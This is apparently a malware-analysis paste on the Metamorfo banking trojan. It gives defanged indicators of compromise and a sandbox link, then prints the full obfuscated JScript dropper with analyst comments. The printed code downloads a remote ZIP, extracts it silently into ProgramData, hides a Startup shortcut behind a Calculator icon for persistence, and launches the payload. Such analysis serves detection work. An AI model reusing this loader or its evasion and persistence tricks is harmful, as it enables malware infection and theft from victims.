1ZRR4H

Metamorfo / 13-03-2020

Mar 15th, 2020
  1. IOCs:
  2. noticiasdelestado[.]xyz/
  3. mycameraxp2020[.]hopto[.]org
  4. sahakorn[.]dusit[.]ac[.]th
  5. webhost[.]dusit[.]ac[.]th
  6. 3[.]136[.]20[.]196/uff/MZX4GA C4C4ZCI65[.]php
  7. 1bbad57911e27bdf7a7462911c00c32183ce0dc09ffaf9006582ce9618041e0a
  8. 9692a12baf2113db4921678f3cf8746933d26d05141748fe09dcef11e5d94f54
  9. 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
  10. 1c323d32ebe66297018940e11a16b4a3737a79a46d39f52b3b39d7e1c32a3eb7
  11.  
  12. SANDBOX:
  13. https://app.any.run/tasks/f7e9c0c4-c8b7-492d-9069-7c01c10bc932/
  14.  
  // Outer-scope declarations for the names the wrapper function below assigns to.
  // Because they are declared here, those assignments (function aliases, decoded
  // strings, random names, COM object handles, renamed-file paths) land in this
  // scope rather than inside the wrapper. _0x34C8 is listed twice; the duplicate
  // is harmless.
  15. var _0x3374, _0x3671, _0x351D, _0x39C3, _0x3572, _0x3A6D, _0x341E, _0x371B, _0x37C5, _0x381A, _0x38C4, _0x35C7, _0x33C9, _0x3AC2, _0x386F, _0x32CA, _0x3770, _0x3B17, _0x34C8, _0x3919, _0x3A18, _0x34C8, _0x361C, _0x396E, _0x36C6, _0x3473, _0x331F;
  16. (function() {
  // String table: every literal the script uses is stored here as \x escapes and
  // referenced by index, so no API name or file name appears in clear text.
  // Plaintext of each entry (analyst reference):
  //   [0]  getTime
  //   [1]  (empty string)
  //   [2]  EUCCDP35858FFKT        -> assigned to _0x351D, the decoder key
  //   [3]  hex blob               -> decoded by _0x3C16, then used as the GET URL
  //   [4]  A-Z a-z 0-9            -> alphabet for random names (_0x3C6B)
  //   [5]  WinHttp.WinHttpRequest.5.1
  //   [6]  GET
  //   [7]  Status
  //   [8]  ResponseBody
  //   [9]  ADODB.Stream
  //   [10] Type
  //   [11] Scripting.FileSystemObject
  //   [12] Shell.Application
  //   [13] .
  //   [14] .exe
  //   [15] .dll
  //   [16] HWLLFD91043EBBP        -> archive base name
  //   [17] .zip
  //   [18] hex blob               -> decoded by _0x3C16, used as the base directory
  //   [19] \WEIHAL78281ACKM       -> marker file name
  //   [20] IFDYTX50738NXIA        -> content written to the marker file
  //   [21] \IUMPLA44369DABT       -> folder name that is only tested for existence
  //   [22] \
  //   [23] WScript.Shell
  //   [24] B54C95B56B9B4182       -> decoded by _0x3C16 with key [2]: "Startup"
  //   [25] .lnk
  //   [26] (single space)
  //   [27] MNMLDU65391MTNE        -> shortcut Description
  //   [28] calc.exe, 0            -> shortcut IconLocation
  // Entries [16], [19], [20], [21] and [27] are fixed in this sample, unlike the
  // 8-character names produced at run time, so they are usable as host indicators.
  17. var _0x3B6C = ["\x67\x65\x74\x54\x69\x6D\x65", "", "\x45\x55\x43\x43\x44\x50\x33\x35\x38\x35\x38\x46\x46\x4B\x54", "\x34\x35\x45\x38\x30\x38\x33\x46\x45\x43\x32\x34\x30\x45\x30\x45\x30\x38\x34\x33\x39\x31\x43\x31\x36\x35\x39\x36\x34\x44\x45\x42\x31\x46\x31\x38\x33\x46\x46\x37\x32\x46\x43\x38\x30\x45\x30\x39\x35\x32\x38\x30\x39\x36\x34\x44\x46\x33\x36\x38\x43\x45\x42\x42\x42\x39\x41\x43\x39\x38\x34\x37\x32\x41\x41\x43\x43\x32\x33\x33\x41\x39\x43\x44\x30\x36\x37\x33\x38\x33\x39\x33\x38\x43\x35\x31\x46\x38\x36\x46\x41\x30\x42\x42\x44\x39\x30\x41\x36\x34\x41\x44\x31\x41\x32\x35\x32\x42\x44\x32\x35\x32\x46\x39\x33\x36\x33\x43\x32\x39\x45\x35\x30\x42\x34\x38", "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39", "\x57\x69\x6E\x48\x74\x74\x70\x2E\x57\x69\x6E\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x2E\x35\x2E\x31", "\x47\x45\x54", "\x53\x74\x61\x74\x75\x73", "\x52\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79", "\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D", "\x54\x79\x70\x65", "\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74", "\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E", "\x2E", "\x2E\x65\x78\x65", "\x2E\x64\x6C\x6C", "\x48\x57\x4C\x4C\x46\x44\x39\x31\x30\x34\x33\x45\x42\x42\x50", "\x2E\x7A\x69\x70", "\x37\x32\x46\x30\x37\x45\x39\x39\x42\x36\x34\x33\x45\x35\x36\x36\x46\x38\x35\x33\x38\x31\x44\x36\x37\x44\x39\x38\x34\x36\x46\x33\x31\x35\x32\x34", "\x5C\x57\x45\x49\x48\x41\x4C\x37\x38\x32\x38\x31\x41\x43\x4B\x4D", "\x49\x46\x44\x59\x54\x58\x35\x30\x37\x33\x38\x4E\x58\x49\x41", "\x5C\x49\x55\x4D\x50\x4C\x41\x34\x34\x33\x36\x39\x44\x41\x42\x54", "\x5C", "\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C", "\x42\x35\x34\x43\x39\x35\x42\x35\x36\x42\x39\x42\x34\x31\x38\x32", 
"\x2E\x6C\x6E\x6B", "\x20", "\x4D\x4E\x4D\x4C\x44\x55\x36\x35\x33\x39\x31\x4D\x54\x4E\x45", "\x63\x61\x6C\x63\x2E\x65\x78\x65\x2C\x20\x30"];
  18.  
  // Blocking delay. Spins in a tight loop until at least _0x32CA seconds have
  // passed, comparing Date.getTime() values ([0] = "getTime"). No sleep API is
  // called, so the script host stays busy for the whole wait.
  // NOTE(review): the main flow calls this between almost every step; the reason
  // is not stated in the file -- presumably pacing or stalling automated analysis.
  19. function _0x3BC1(_0x32CA) {
  20. var _0x331F = new Date();
  21. var _0x33C9 = 0;
  // _0x32CA is in seconds; elapsed time is tracked in milliseconds.
  22. while (_0x33C9 < (_0x32CA * 1000)) {
  23. var _0x3374 = new Date();
  // Redeclared with var on each pass; same function-scoped variable as above.
  24. var _0x33C9 = _0x3374[_0x3B6C[0]]() - _0x331F[_0x3B6C[0]]()
  25. }
  26. }
  27.  
  // String decoder for the hex blobs in the string table.
  // Input: hex text, two characters per byte. The first byte is a seed; every
  // following byte is XORed with the next character of the key held in the
  // outer variable _0x351D (key repeats), then the previous ciphertext byte is
  // subtracted. Returns the decoded string, or undefined for an empty input.
  // The key must already be assigned when this is called.
  28. function _0x3C16(_0x3572) {
  29. if (_0x3572 == _0x3B6C[1]) {
  30. return
  31. };
  // Key length; _0x3374 below is the running key index, starting before 0.
  32. var _0x341E = _0x351D.length;
  33. var _0x3374 = -1;
  34. var _0x331F = 0;
  35. var _0x34C8 = _0x3B6C[1];
  36. var _0x33C9 = 0;
  37. var _0x32CA = 0;
  38. var _0x3473 = 0;
  // Seed: first byte of the blob, used as the "previous byte" for round one.
  39. _0x331F = parseInt(_0x3572.substr(0, 2), 16);
  40. for (_0x33C9 = 2; _0x33C9 < _0x3572.length; _0x33C9 += 2) {
  41. _0x32CA = parseInt(_0x3572.substr(_0x33C9, 2), 16);
  // Advance the key index, wrapping to 0 after the last key character.
  42. if (_0x3374 < _0x341E - 1) {
  43. _0x3374++
  44. } else {
  45. _0x3374 = 0
  46. };
  47. _0x3473 = _0x32CA ^ _0x351D.charCodeAt(_0x3374);
  // Subtract the previous ciphertext byte; add 255 (not 256) when the result
  // would be zero or negative.
  48. if (_0x3473 <= _0x331F) {
  49. _0x3473 = 255 + _0x3473 - _0x331F
  50. } else {
  51. _0x3473 = _0x3473 - _0x331F
  52. };
  53. _0x34C8 += String.fromCharCode(_0x3473);
  // Chain on the raw ciphertext byte, not on the decoded character.
  54. _0x331F = _0x32CA
  55. };
  56. return _0x34C8
  57. }
  58.  
  // Returns a random string of _0x3374 characters drawn from the A-Z a-z 0-9
  // alphabet in string-table entry [4], using Math.random(). The main flow uses
  // it for folder, file and shortcut names, so those names differ on every run
  // and are not usable as fixed indicators.
  59. function _0x3C6B(_0x3374) {
  60. var _0x32CA = _0x3B6C[1];
  61. var _0x33C9 = _0x3B6C[4];
  62. for (var _0x331F = 0; _0x331F < _0x3374; _0x331F++) {
  63. _0x32CA += _0x33C9.charAt(Math.floor(Math.random() * _0x33C9.length))
  64. };
  65. return _0x32CA
  66. }
  67.  
  // Downloads a URL to a local file.
  // _0x3374: URL to fetch; _0x33C9: destination path.
  // Returns false when the request throws or the status is 404, true otherwise.
  // COM objects used: WinHttp.WinHttpRequest.5.1 ([5]) and ADODB.Stream ([9]).
  68. function _0x3CC0(_0x3374, _0x33C9) {
  69. var _0x32CA;
  70. var _0x341E;
  71. try {
  72. var _0x331F = new ActiveXObject(_0x3B6C[5]);
  // Resolve, connect, send and receive timeouts, in milliseconds.
  73. _0x331F.SetTimeouts(30000, 30000, 30000, 5000);
  // Synchronous GET: the third Open argument (async) is false.
  74. void(((_0x331F.Open(_0x3B6C[6], _0x3374, false))));
  75. _0x331F.Send();
  // Only 404 is rejected; the body of any other status is written to disk.
  76. if (_0x331F[_0x3B6C[7]] == 404) {
  77. return false
  78. };
  79. _0x32CA = _0x331F[_0x3B6C[8]]
  80. } catch (ex) {
  81. return false
  82. };
  // The write below is outside the try block, so a stream or save failure
  // raises to the caller.
  83. _0x341E = new ActiveXObject(_0x3B6C[9]);
  // Type = 1 selects a binary stream.
  84. _0x341E[_0x3B6C[10]] = 1;
  85. _0x341E.Open();
  86. _0x341E.Write(_0x32CA);
  // Save option 2 overwrites an existing file at the destination.
  87. _0x341E.SaveToFile(_0x33C9, 2);
  88. _0x341E.Close();
  89. return true
  90. }
  91.  
  // Extracts an archive with the Windows shell, then deletes the archive.
  // _0x3374: archive path; _0x33C9: destination folder ("." when not given).
  // Uses Scripting.FileSystemObject ([11]) and Shell.Application ([12]).
  92. function _0x3D15(_0x3374, _0x33C9) {
  93. var _0x331F = new ActiveXObject(((_0x3B6C[11]))),
  94. _0x341E = new ActiveXObject((_0x3B6C[12])),
  95. _0x32CA, _0x3473;
  96. if (!_0x33C9) {
  97. _0x33C9 = _0x3B6C[13]
  98. };
  99. if (!_0x331F.FolderExists(_0x33C9)) {
  100. _0x331F.CreateFolder(_0x33C9)
  101. };
  102. _0x32CA = _0x341E.NameSpace(_0x331F.getFolder(_0x33C9).Path);
  // getFile runs before the FileExists test below, so a missing archive would
  // raise here instead of being skipped.
  103. _0x3473 = _0x341E.NameSpace(_0x331F.getFile(_0x3374).Path);
  104. if (_0x331F.FileExists(_0x3374)) {
  // CopyHere flags 4 + 16: no progress dialog, answer "Yes to All" to prompts,
  // so nothing is shown to the user during extraction.
  105. _0x32CA.CopyHere(_0x3473.Items(), 4 + 16);
  // The archive is removed once its contents are copied out.
  106. _0x331F.deletefile(_0x3374)
  107. }
  108. }
  109.  
  // Renames the files in folder _0x32CA according to their size and stores the
  // new paths in outer variables. Names come from the outer variables set by
  // the main flow (random 8-character values).
  //   size >= 1000009           -> _0x35C7 (random name + ".dll"), path in _0x33C9
  //   size <  10009             -> _0x381A (random name, no extension), path in _0x386F
  //   300009 < size < 1000009   -> _0x37C5 (random name + ".exe"), path in _0x3AC2
  // Files from 10009 up to 300009 are left as they are.
  // Always returns an empty string: the local _0x351D declared below shadows
  // the outer decoder key and is set to [1] ("").
  // NOTE(review): the files are identified purely by size, so the extracted
  // names carry no meaning; the three-file shape (executable, small file, large
  // DLL) looks like a loader started with two arguments -- confirm against the
  // sandbox report.
  110. function _0x3D6A(_0x32CA) {
  111. var _0x341E, _0x34C8, _0x3374, _0x331F, _0x351D;
  // Three separate FileSystemObject instances are created; _0x34C8 is not used.
  112. _0x34C8 = new ActiveXObject(((_0x3B6C[11])));
  113. var _0x3473;
  114. _0x3473 = new ActiveXObject(((_0x3B6C[11])));
  115. _0x341E = new ActiveXObject(((_0x3B6C[11])));
  116. _0x3374 = _0x341E.GetFolder(_0x32CA);
  117. _0x331F = new Enumerator(_0x3374.files);
  118. _0x351D = _0x3B6C[1];
  119. for (; !_0x331F.atEnd(); _0x331F.moveNext()) {
  120. if (_0x331F.item().size >= 1000009) {
  121. _0x3473.MoveFile(_0x331F.item(), _0x32CA + _0x35C7);
  122. _0x33C9 = _0x32CA + _0x35C7
  123. } else {
  124. if (_0x331F.item().size < 10009) {
  125. _0x3473.MoveFile(_0x331F.item(), _0x32CA + _0x381A);
  126. _0x386F = _0x32CA + _0x381A
  127. } else {
  // Bitwise & on two booleans; the result is the same as && here.
  128. if (_0x331F.item().size < 1000009 & _0x331F.item().size > 300009) {
  129. _0x3473.MoveFile(_0x331F.item(), _0x32CA + _0x37C5);
  130. _0x3AC2 = _0x32CA + _0x37C5
  131. }
  132. }
  133. }
  134. };
  135. return _0x351D
  136. }
  // Main flow. In order: set up names, check a run-once marker, register a
  // Startup shortcut, download an archive, extract it, rename the extracted
  // files by size, and start the extracted executable.
  // Host artifacts visible here: the marker file [19], a randomly named folder
  // under the base directory, and a .lnk in the Startup folder whose icon is
  // "calc.exe, 0" and whose description is [27].
  // Aliases of the helper functions, stored in the outer-scope variables.
  137. _0x3374 = _0x3BC1;
  138. _0x3671 = _0x3C16;
  139. _0x3572 = _0x3C6B;
  140. _0x3A6D = _0x3CC0;
  141. _0x341E = _0x3D15;
  142. _0x3B17 = _0x3D6A;
  // Decoder key; must be set before the first _0x3C16 call on the next line.
  143. _0x351D = _0x3B6C[2];
  // Decoded blob [3]; passed as the URL to the download helper further down.
  144. _0x39C3 = _0x3C16(_0x3B6C[3]);
  // Random 8-character names: working folder, executable (.exe), extension-less
  // file, and DLL (.dll).
  145. _0x371B = _0x3C6B(8);
  146. _0x37C5 = _0x3C6B(8) + (_0x3B6C[14]);
  147. _0x381A = _0x3C6B(8);
  148. _0x38C4 = _0x3C6B(8);
  149. _0x35C7 = _0x38C4 + (_0x3B6C[15]);
  // Archive file name: "HWLLFD91043EBBP" + ".zip".
  150. _0x32CA = _0x3B6C[16] + (_0x3B6C[17]);
  // Base directory; blob [18] decodes with key [2] to "C:\\Programdata\\"
  // (backslashes doubled as stored).
  151. _0x3770 = _0x3C16(_0x3B6C[18]);
  152. _0x3BC1(2);
  153. _0x3BC1(2);
  // Run-once check: if the marker file [19] already exists under the base
  // directory the script exits; otherwise it creates the marker with content [20].
  154. _0x34C8 = new ActiveXObject(_0x3B6C[11]);
  155. if (_0x34C8.FileExists(_0x3770 + _0x3B6C[19])) {
  156. WScript.Quit()
  157. } else {
  158. try {
  159. _0x3919 = new ActiveXObject(_0x3B6C[11]);
  160. _0x3A18 = _0x3919.CreateTextFile(_0x3770 + _0x3B6C[19], true);
  161. _0x3A18.WriteLine(_0x3B6C[20]);
  162. _0x3A18.Close()
  // Failure to write the marker is ignored and execution continues.
  163. } catch (ex) {}
  164. };
  165. _0x3BC1(2);
  166. _0x34C8 = new ActiveXObject(((_0x3B6C[11])));
  // If folder [21] exists under the base directory, nothing further happens.
  // The visible code only tests for this folder and never creates it.
  167. if (_0x34C8.FolderExists(_0x3770 + _0x3B6C[21])) {} else {
  168. try {
  169. _0x361C = new ActiveXObject(((_0x3B6C[11])));
  // Working folder: base directory + "\" + random name.
  170. _0x361C.CreateFolder(_0x3770 + _0x3B6C[22] + _0x371B);
  171. _0x3BC1(2);
  172. _0x396E = new ActiveXObject((_0x3B6C[23]));
  // Persistence: blob [24] decodes to "Startup", so the shortcut is written to
  // the user's Startup folder. KAIEND16015MAVW is an undeclared (implicit
  // global) variable.
  173. KAIEND16015MAVW = _0x396E.SpecialFolders(_0x3C16(_0x3B6C[24]));
  174. _0x36C6 = _0x396E.CreateShortcut(KAIEND16015MAVW + _0x3B6C[22] + _0x3C6B(8) + (_0x3B6C[25]));
  // Target is the renamed executable in the working folder; the two arguments
  // are the paths of the extension-less file and the DLL.
  175. _0x36C6.TargetPath = _0x3770 + _0x371B + _0x3B6C[22] + _0x37C5;
  176. _0x36C6.Arguments = _0x3B6C[26] + _0x3770 + _0x371B + _0x3B6C[22] + _0x381A + _0x3B6C[26] + _0x3770 + _0x371B + _0x3B6C[22] + _0x35C7;
  177. _0x36C6.Description = _0x3B6C[27];
  178. _0x36C6.Hotkey = _0x3B6C[1];
  // Icon taken from calc.exe, so the shortcut looks like the Calculator.
  179. _0x36C6.IconLocation = _0x3B6C[28];
  // WindowStyle 7: start minimized.
  180. _0x36C6.WindowStyle = 7;
  181. _0x36C6.WorkingDirectory = _0x3770 + _0x371B;
  182. _0x36C6.Save()
  // Folder and shortcut errors are ignored; the download still runs.
  183. } catch (ex) {};
  184. _0x3BC1(2);
  185. _0x3BC1(2);
  // Download the decoded URL to <working folder>\HWLLFD91043EBBP.zip. The
  // true/false result is not checked.
  186. _0x3CC0(_0x39C3, _0x3770 + _0x371B + _0x3B6C[22] + _0x32CA);
  187. _0x3BC1(2);
  188. _0x3BC1(2);
  // Extract into the working folder and delete the archive. Not wrapped in
  // try/catch: if the download produced no file, the helper's getFile call
  // would raise and end the script here.
  189. _0x3D15(_0x3770 + _0x371B + _0x3B6C[22] + _0x32CA, _0x3770 + _0x371B + _0x3B6C[22]);
  190. _0x3BC1(2);
  191. _0x3BC1(2);
  192. _0x3BC1(2);
  // Rename extracted files by size; sets _0x3AC2 when an executable-sized file
  // was found.
  193. _0x3D6A(_0x3770 + _0x371B + _0x3B6C[22]);
  194. _0x3BC1(2);
  195. _0x3BC1(2);
  196. _0x3473 = new ActiveXObject((_0x3B6C[23]));
  197. _0x331F = new ActiveXObject(((_0x3B6C[11])));
  // Launch via WScript.Shell.Run: "<exe>" "<extension-less file>" "<dll>", each
  // path quoted (char 34) and separated by a space (char 32). Same command line
  // as the Startup shortcut.
  198. if (_0x331F.FileExists(_0x3AC2)) {
  199. _0x3473.Run(String.fromCharCode(34) + _0x3770 + _0x371B + _0x3B6C[22] + _0x37C5 + String.fromCharCode(34) + String.fromCharCode(32) + String.fromCharCode(34) + _0x3770 + _0x371B + _0x3B6C[22] + _0x381A + String.fromCharCode(34) + String.fromCharCode(32) + String.fromCharCode(34) + _0x3770 + _0x371B + _0x3B6C[22] + _0x35C7 + String.fromCharCode(34))
  200. };
  201. _0x3BC1(11)
  202. }
  203. })()